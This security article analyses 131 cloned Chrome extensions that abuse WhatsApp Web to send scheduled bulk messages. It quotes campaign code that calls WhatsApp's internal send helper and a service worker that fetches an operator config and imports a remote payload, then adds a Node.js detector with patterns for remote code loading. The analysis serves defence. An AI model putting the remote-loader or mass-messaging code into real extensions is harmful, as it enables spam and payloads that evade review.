Surge of Malicious Chrome Extensions Exploiting WhatsApp Web for Unauthorized Messaging

In recent months, security researchers have identified a sharp rise in fraudulent Chrome extensions posing as legitimate tools for automating WhatsApp Web. A total of 131 such extensions have been found; each is presented as a distinct product, but they share one codebase built to send bulk messages and schedule communications without the recipient's consent.

These extensions work by injecting their own scripts into the WhatsApp Web page, where they run in the site's JavaScript context and bypass the platform's built-in rate limits and anti-spam protections. They advertise message templates, scheduling, and analytics dashboards, and they target small businesses, particularly in Brazil, where WhatsApp is a primary channel for customer engagement.

Using the Manifest V3 service worker, these extensions run background tasks that schedule bulk messages without explicit user interaction. Analysts at Socket.dev report that the shared core module contains code along these lines:

```javascript
// Runs inside the WhatsApp Web page once the DOM is ready.
document.addEventListener('DOMContentLoaded', () => {
  // Grab the page's own internal send helper from the WPP object the site exposes;
  // scheduledMessages is populated from the remote configuration described below.
  const msgHelper = window.WPP.helpers.sendMessage;
  scheduledMessages.forEach(({ contact, text, time }) => {
    // `time` is the delay in milliseconds before this message is sent.
    setTimeout(() => msgHelper(contact, text), time);
  });
});
```

This script attaches to the page's Document Object Model (DOM) and calls WhatsApp's internal send function directly rather than simulating clicks, so the messages leave through the same code path as ones a user types. That is what blurs the line between legitimate automation and spamming.

Further investigation showed that the service worker fetches a remote configuration file from the operator's infrastructure, which lets the operator change message patterns and throttling parameters on the fly to evade detection. Despite Chrome Web Store policies that prohibit duplicate listings and unauthorized messaging, all 131 extensions were still live as of mid-October 2025.

Each clone is marketed through a polished landing page that promises privacy compliance and rigorous code audits, claims at odds with the extensions' actual behaviour and with Chrome Web Store policy. The distribution model resembles a franchise-style reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and sell their own subscription plans, while the original operator keeps control of the backend.

Evasion and Persistence Tactics

The operators use several tactics to stay ahead of detection. By varying send intervals, randomizing message content, and rotating publisher accounts, they keep the campaign running through takedown requests.

A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:

```javascript
// Service worker: on each periodic sync tick, pull the operator's configuration
// and load whichever script URL it names. configUrl points at the operator's server.
self.addEventListener('periodicsync', event => {
  event.waitUntil(
    fetch(configUrl)
      .then(response => response.json())
      // The payload URL comes from the remote config, so the code that actually
      // runs can change without the extension package itself changing.
      .then(cfg => importScripts(cfg.payloadUrl))
  );
});
```

This periodic sync handler means that even if Chrome flags a particular payload, the extension can pull an unflagged version from the remote server. It is also a direct violation of Manifest V3, which bars extensions from executing remotely hosted code, so a service worker that fetches a script URL at runtime is a strong indicator on its own. Combined with varied naming and thousands of active users across listings, this campaign is large-scale policy abuse and underscores the need for stronger extension governance and user vigilance.
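The traits described above (content scripts aimed at web.whatsapp.com, page-world injection, and a service worker that fetches a script URL at runtime) can be checked statically before an extension is allowed onto a fleet. The following Node.js script is an added example and is not code from the article or from Socket.dev's research; it triages an unpacked extension from its manifest.json and service-worker source. The two inputs are constructed in-memory samples (the host api.example.invalid and the extension names are placeholders), so it runs offline; in practice you would read the files from the extension directory.

```javascript
'use strict';

// Added example, not the campaign's code. Flags Manifest V3 extensions that show
// the article's pattern: WhatsApp Web targeting plus runtime loading of remote code.

// True for host patterns that cover WhatsApp Web, including catch-all patterns.
function targetsWhatsApp(pattern) {
  if (pattern === '<all_urls>' || /^\*:\/\/\*\//.test(pattern)) return true;
  return /:\/\/([^/]*\.)?whatsapp\.com(\/|$)/.test(pattern);
}

// Indicators in the service-worker source. A non-literal importScripts argument,
// or eval / new Function, means code outside the reviewed package can run,
// which Manifest V3 forbids (no remotely hosted code).
const WORKER_INDICATORS = [
  { id: 'remote-fetch',          re: /\bfetch\s*\(/ },
  { id: 'dynamic-importScripts', re: /\bimportScripts\s*\(\s*(?!['"`])/ },
  { id: 'eval-or-Function',      re: /\b(?:eval|new\s+Function)\s*\(/ },
];

function triageExtension(ext) {
  const m = ext.manifest;
  const findings = [];

  // Where does the extension inject itself?
  const scripts = m.content_scripts || [];
  const urlPatterns = [
    ...scripts.flatMap(cs => cs.matches || []),
    ...(m.host_permissions || []),
  ];
  const hits = urlPatterns.filter(targetsWhatsApp);
  if (hits.length) findings.push({ id: 'targets-whatsapp-web', detail: hits.join(', ') });

  // world: "MAIN" puts the content script in the page's own JS context, where
  // it can reach objects such as window.WPP instead of just the DOM.
  if (scripts.some(cs => cs.world === 'MAIN')) {
    findings.push({ id: 'page-world-injection', detail: 'content script declared with world: "MAIN"' });
  }

  // scripting allows programmatic injection; alarms is the supported way to
  // run periodic background work in an MV3 service worker.
  const perms = new Set(m.permissions || []);
  for (const p of ['scripting', 'alarms']) {
    if (perms.has(p)) findings.push({ id: `permission-${p}`, detail: p });
  }

  const src = ext.workerSource || '';
  for (const ind of WORKER_INDICATORS) {
    if (ind.re.test(src)) findings.push({ id: ind.id, detail: 'in service worker source' });
  }

  // Verdict: WhatsApp targeting alone is benign (themes, shortcuts); combined
  // with remote code loading it matches the campaign's signature.
  const ids = new Set(findings.map(f => f.id));
  const loadsRemoteCode = ids.has('dynamic-importScripts') || ids.has('eval-or-Function');
  let verdict = 'low';
  if (ids.has('targets-whatsapp-web') && loadsRemoteCode) verdict = 'high';
  else if (ids.has('targets-whatsapp-web') && (ids.has('page-world-injection') || ids.has('remote-fetch'))) verdict = 'medium';

  return { name: m.name, verdict, findings };
}

// Constructed sample in the shape the article describes (names and hosts are placeholders).
const bulkSenderClone = {
  manifest: {
    manifest_version: 3,
    name: 'ZapBlaster Pro (constructed sample)',
    permissions: ['scripting', 'alarms', 'storage'],
    host_permissions: ['https://web.whatsapp.com/*', 'https://api.example.invalid/*'],
    content_scripts: [{ matches: ['https://web.whatsapp.com/*'], js: ['inject.js'], world: 'MAIN' }],
    background: { service_worker: 'sw.js' },
  },
  workerSource: [
    "const configUrl = 'https://api.example.invalid/cfg.json';",
    "self.addEventListener('periodicsync', event => {",
    "  event.waitUntil(fetch(configUrl).then(r => r.json()).then(cfg => importScripts(cfg.payloadUrl)));",
    '});',
  ].join('\n'),
};

// Constructed benign control: a CSS-only theme for the same site.
const themeExtension = {
  manifest: {
    manifest_version: 3,
    name: 'WhatsApp Dark Theme (constructed sample)',
    permissions: ['storage'],
    content_scripts: [{ matches: ['https://web.whatsapp.com/*'], css: ['theme.css'] }],
  },
  workerSource: "importScripts('lib/settings.js'); // static, bundled file",
};

for (const ext of [bulkSenderClone, themeExtension]) {
  const r = triageExtension(ext);
  console.log(`${r.name}: ${r.verdict} (${r.findings.map(f => f.id).join(', ')})`);
}
```

The theme sample comes out `low` even though it targets web.whatsapp.com, which is the point: host targeting is common and legitimate, and the useful signal is the combination with page-world injection and a worker that loads code from a URL it learns at runtime.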